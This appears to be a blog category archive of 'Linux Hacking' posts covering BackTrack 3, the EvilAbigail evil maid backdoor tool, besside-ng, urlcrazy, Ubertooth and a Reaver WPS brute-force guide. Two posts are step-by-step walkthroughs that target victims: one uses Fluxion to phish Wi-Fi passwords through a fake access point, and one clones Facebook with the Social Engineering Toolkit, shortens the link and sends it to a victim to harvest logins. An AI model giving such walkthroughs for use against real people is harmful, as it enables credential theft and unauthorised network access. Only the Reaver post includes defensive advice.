Category Archives: (I) Linux Hacking

BackTrack 3 Final Hacking LiveCD Released For Download

f you don’t know, BackTrack 3 is a top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

BackTrack 3 Final Hacking LiveCD Released For Download

 

Back in January we mentioned the BackTrack Live Hacking CD BETA 3 was released, at last the final version is ready for download!

New Stuff in BackTrack 3

SAINT
SAINT has provided BackTrack users with a functional version of SAINT, pending a free request for an IP range license through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for co-operating with us and allowing us to feature this amazing tool in BackTrack.

Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel
2.6.21.5. Yes, yes, stop whining….We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel as wireless injection patches were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly increased hardware compatibilities. All relevant security patches have been applied.

 

Tools
As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.

Availability

For the first time we distribute three different version of Backtrack 3:

  • CD version
  • USB version
  • VMWare version

You can download BackTrack 3 Final here:

Softpedia

EvilAbigail – Automated Evil Maid Attack For Linux

EvilAbigail is a Python-based tool that allows you run an automated Evil Maid attack on Linux systems, this is the Initrd encrypted root fs attack. An Evil Maid attack is a type of attack that targets a computer device that has been shut down and left unattended.

EvilAbigail - Automated Evil Maid Attack For Linux

An Evil Maid attack is characterized by the attacker’s ability to physically access the target multiple times without the owner’s knowledge.

 

Scenarios

  • Laptop left turned off with FDE turned on
  • Attacker boots from USB/CD/Network
  • Script executes and backdoors initrd
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7

You can download EvilAbigail here:

EvilAbigail-master.zip

Or read more here.

How To Hack WI-FI Using Social Engineering Tool-Fluxion on Kali Linux.

“Note:Please, Do Not Use This Method In Any Illegal Or Malicious Activities”

Requirements
1.Kali-Linux Operating System-download
2.Fluxion Tool-download
3.Patience And Presence of mind.

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali comes with the hundreds of Social-Engineering and Testing Tools. Kali Linux is developed using a secure environment with only a small number of trusted people that are allowed to commit packages, with each package being digitally signed by the developer. Kali also has a custom-built kernel that is patched for 802.11 wireless injection. This was primarily added because the development team found they needed to do a lot of wireless assessments.It Is Open Source and Free To Download.

What is Fluxion?

A Fluxion is a power Social Engineering tool used in Security Testing And Wi-Fi-Network Cracking. While hacking WEP, WPA and WPA2 We Require an Advance Tool Like This. Fluxion is the future—a blend of technical and social engineering automation that trick a user into handing over the Wi-Fi password in a matter of keystrokes.

Steps To Go:-
1.Download And Install Kali-Linux Operating System.
2.Download Fluxion and Paste It On Your Kali-Desktop(Do not Edit Any File Or Folder).

3.Open Kali-Linux terminal window and type the following commands:-
    “cd Desktop”
    “cd fluxion”
     “ls”
Note:You Must Be Connected To Internet Connection in order to install Fluxion correctly.
     type “./fluxion.sh” then Press Enter.
6.Open Fluxion And Select Your Language.

7.Select All Channels.

8.Choose Network To Attack.

9.Select-“Fake-AP”.

10.Select-“Enter”.

11.Select-“aircarck-ng”.

10.Select-“Deauth All”.

And Wait For 2 Minutes While Fluxion is Capturing the Target Handshake(It is a File Containing Victims Password But Encrypted in Hashes).
11.Then Select “Check Handshake”

12.Then Select-“Create a SSl Certificate”.

13.Choose-“Web-Interface”

Then,a Window will Pop-Up Showing Phishing Site For Hacking. Fluxion have many phishing sites and these phishing sites can be edit as per users need.
You can make your own phishing site or If you want any custom phishing site. Just mail me on Gmail.

So,here is a Catch Fluxion Will Just Block The Real Access Point And Will Open A Fake Access Point. So, that Victim must be Connected To The Fake AP(Access Point)Which was Created By us in above Step.
As the Victim is Connected by our Network it take user to the browser’s login page and there he just enter his WI-FI-password.That come to us by Phishing Site,hosted by us through Fluxion.

Fake Access Point

Phishing Site

So,I Hope You Have Understood the Concept Of Hacking Via Fluxion.

besside – ng :- crack a WEP or WPA key without user intervention and collaborate with WPA cracking

besside-ng – crack a WEP or WPA key without user intervention and collaborate with WPA cracking statistics 

SYNOPSIS

besside-ng [options] <interface>

DESCRIPTION

besside-ng is a tool wich will crack all the WEP networks in range and log all the WPA handshakes. WPA handshakes can be uploaded to the online cracking service at wpa.darkircop.org. Wpa.darkircop.com also provides useful statistics based on user-submitted capture files about the feaseability of WPA cracking.

-b <target mac>
Specifies the target’s BSSID
-s <WPA server>
Where to upload capture file for cracking. A good choice is wpa.darkircop.org
-c <chan>
Channel lock
-p <pps>
Packages per second to send (flood rate).
-W
Crack only WPA networks
-v
Verbos mode. Use -vv for more verbose, -vv for even more and so on.
-h
Help screen

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

STEPS:

1. Boot up kali linux on your machine and open terminal.
2. Type this command in the kali linux terminal.
                    root@kali~# setoolkit
3. Enter ‘y’ to agree the social engineering toolkit terms and conditions.
4. Select the following options one by one from the menu
                ‘1’ (Social Engineering Attacks) then
                ‘2’(Website Attack Vectors) then
                ‘3’(Credential Harvester Attack) then
5. Type ‘2’ (Site cloner)
          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          set:webattack>Enter the url to clone: www.fb.com
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.
7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW.

Install Kali Linux On Raspberry Pi 3 : Creation of a Hacking Machine

INSTALLATION REQUIREMENTS :

DOWNLOAD LINKS :

STEPS:

1. Download all files from the above links.
2. Insert SD CARD and open Win32DiskImager . Locate your kali linux image file and sd card. Hit        write.
3. After the writing process is done. Insert SD card in Raspberry Pi and do setup as shown
4. Open Network sharing. Do the settings as shown.
5. Open cmd and type arp -a .Note your ip address.
6. Open Putty () and do configuration as shown.
7. Commands to install GUI
     apt-get update
     apt-get install lxde
     apt-get install lightdm
8. Open Xming  and type startlxde
9. Successfully Installed

How to use urlcrazy in kali linux

Intro – URLCrazy is a tool that can generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. It generates 15 types of domain variants, knows over 8000 common misspellings, supports multiple keyboard layouts, can check if a typo is a valid domain, tests if domain typos are in use, and estimates the popularity of a typo.

  1. How to open
  2. GUI Method

Application → kali Linux → information gathering → DNS analysis → UrlCrazy

                                                                  (click image for large view)

Open Terminal type urlcrazy and hit enter.

  • This command is used to scan a url after scanning we can see names of the characters on the wrong web, Spelling reversed etc kindly use this command and see yourself I cant show you whole image here.

Syntax – urlcrazy domain

Ex – urlcrazy www.google.com

  • This command is used to check domain popularity.

Syntax – urlcrazy –p domainname

EX – urlcrazy –p www.mcdonalds.com

  • This command is used to show invalid domain name

Syntax – urlcrazy –I domainname

EX – urlcrazy –I www.mcdonalds.com

  • This command is used to do not resolve the DNS

Syntax – urlcrazy –r domainname

Ex- urlcrazy –r www.mcdonalds.com

Ubertooth – Open Source Bluetooth Sniffer

Ubertooth is an open source Bluetooth sniffer and is essentially a development platform for Bluetooth experimentation. It runs best as a native Linux install and should work fine from within a VM.

 

Ubertooth - Open Source Bluetooth Sniffer

Ubertooth ships with a capable BLE (Bluetooth Smart) sniffer and can sniff some data from Basic Rate (BR) Bluetooth Classic connections.

 

Features

The Ubertooth is able to capture and demodulate signals in the 2.4GHz ISM band with a bandwidth of 1MHz using a modulation scheme of Frequency Shift Keying or related methods.

This includes, but is not limited to:

  • Bluetooth Basic Rate packets
  • Bluetooth Low Energy (Bluetooth Smart)

The following may be possible:

  • 802.11 FHSS (1MBit)
  • Some proprietary 2.4GHz wireless devices

You can download Ubertooth here:

ubertooth-2017-03-R2.zip

Hacking router with Reaver, guide to brute forcing Wifi Protected Setup

I thought I would share how easy it is to take down a router that is vulnerable against WPS attacks like my own. Reaver is an open source tool that brute forces WPS (Wifi Protected Setup). This is the pin (usually printed on the bottom of your router) that you can use to authenticate other devices to your wireless network without typing in a password. With enough time, reaver can crack this pin and reveal the WPA or WPA2 password.

Getting Started
To get started you will need to be on Linux, you will need the aircrack suite and reaver installed, and your wireless nic will need to be put into monitor mode. I’m using Ubuntu for this post from a friends computer. You’ll notice I’ve masked some personal details in the images below to hide my router details. I’ll explain as we move along.

In Ubuntu(debian) you can install aircrack and reaver just like you install everything else.

If you need to download, and need help installing Ubuntu, you can use this page for help.
http://www.ubuntu.com/download/desktop

Next you need to put your wireless card into monitor mode (mon0). I’m using an internal wireless card so my wireless interface is wlan0, however you can run ifconfig to ensure your using wlan0 or wlan1. To put your interface into monitor mode you would run the following:

Next you need to obtain the unique identifier for the router you wish to crack. Here’s a screenshot of me running airodump to grab my access points bssid. Masked for privacy reasons but you get the point.

bssid

 

If you like, you can use the tool Wash to test to see if WPS is enabled on the router in question. Notice that I used the arguement –ignore-fcs in my syntax to hide any fcs errors.You can see from the picture below that WPS is enabled on the router found.

wash

Now you can start up reaver.

startingreaver

 

 

Now reaver runs for a while, trying to bruteforce the WPS pin.

reaverinprogress

 

 

In After about 2 hours, reaver hits my pin and gives up the password for the router. In the screenshot I re-run reaver with my pin used first to save time. And that’s it. It’s that easy.

 

passwordgot

 

 

If you need any help with the commands you can ask for help, or read the man pages.

Protecting yourself
The easiest way to protect yourself is to turn WPS off, however some routers don’t have an option to turn it off, and some routers are still vulnerable even if the feature is turned off. Personally I would recommend using a third party firmware on your router like DD-WRT. DD-WRT doesnt support WPS, so no worries there.

Further reading:
If your looking to learn more about wireless hacking and reaver here are some links I would suggest.

http://www.aircrack-ng.org – aircrack suite
http://code.google.com/p/reaver-wps/
– Reaver webpage, also has a point and click commercial version.